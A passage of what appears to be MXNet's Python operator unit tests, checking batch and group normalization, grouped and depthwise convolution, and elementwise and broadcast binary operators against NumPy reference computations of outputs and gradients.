in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@xfail_when_nonstandard_decimal_separator
@pytest.mark.parametrize('op_name', ['BatchNorm', 'SyncBatchNorm'])
@pytest.mark.parametrize('shape', [(4, 2), (4, 3, 4),
(4, 6, 4, 5), (4, 5, 6, 4, 5)])
@pytest.mark.parametrize('fix_gamma', [False, True])
@pytest.mark.parametrize('cudnn_off', [False, True])
@pytest.mark.parametrize('output_mean_var', [False, True])
def test_batchnorm(op_name, shape, fix_gamma, cudnn_off, output_mean_var):
if op_name == 'BatchNorm':
op = mx.nd.BatchNorm
elif op_name == 'SyncBatchNorm':
op = mx.nd.contrib.SyncBatchNorm
else:
raise ValueError(f'Not supported {op_name}')
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req):
kwargs = dict(output_mean_var=output_mean_var)
if op_name == 'SyncBatchNorm':
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
if not fix_gamma:
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad(grad_req=gamma_grad_req)
else:
bn_gamma = mx.nd.ones(shape=(nch,))
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad(grad_req=beta_grad_req)
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
adX, adW, adb = 0, 0, 0
is_train = data_grad_req != 'null' or \
(not fix_gamma and gamma_grad_req != 'null') or \
beta_grad_req != 'null'
for _ in range(num_iters):
if data_grad_req != 'add':
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=fix_gamma, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
if is_train:
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
m = np.prod(shape) / shape[axis]
# cudnn uses m-1 in the denominator of its sample variance calculation, not m
sample_var_adjust = 1.0 if cudnn_off or fix_gamma else m / (m-1)
running_var = running_var * momentum + \
data_var_flat * sample_var_adjust * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
adX = dX if data_grad_req != 'add' else adX + dX
adW = dW if gamma_grad_req != 'add' else adW + dW
adb = db if beta_grad_req != 'add' else adb + db
atol, rtol = 5e-2, 5e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
if is_train:
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
if data_grad_req != 'null':
assert_almost_equal(data.grad.asnumpy(),
adX.asnumpy(), atol=atol, rtol=rtol)
if not fix_gamma:
if gamma_grad_req != 'null':
assert_almost_equal(
bn_gamma.grad.asnumpy(), adW.asnumpy(),
atol=atol, rtol=rtol)
else:
assert((bn_gamma.asnumpy() == 1).all())
if beta_grad_req != 'null':
assert_almost_equal(
bn_beta.grad.asnumpy(), adb.asnumpy(), atol=atol, rtol=rtol)
grad_reqs = ['write'] if len(shape) != 4 else ['null', 'write', 'add']
for data_grad_req in grad_reqs:
for gamma_grad_req in grad_reqs:
if fix_gamma and gamma_grad_req != 'null':
continue
for beta_grad_req in grad_reqs:
for axis in range(len(shape)):
_test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req)
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, dshape[1], 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat.reshape(dshape) * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out, mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, dshape[1], 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
gamma_grad = np.sum(x_hat * ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
x_hat_grad = ograd * gamma.reshape(1, num_groups, dshape[1] // num_groups, 1, 1)
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_channels,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd, dtype=np_ograd.dtype)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1._simple_bind(default_context(), x=shape)
exe2 = y2._simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@pytest.mark.skip(reason="Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1._simple_bind(dev, x=shape)
exe2 = y2._simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv._bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv._bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
o = y.forward(is_train=True)
y.backward([mx.nd.array(out, dtype=o[0].dtype)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
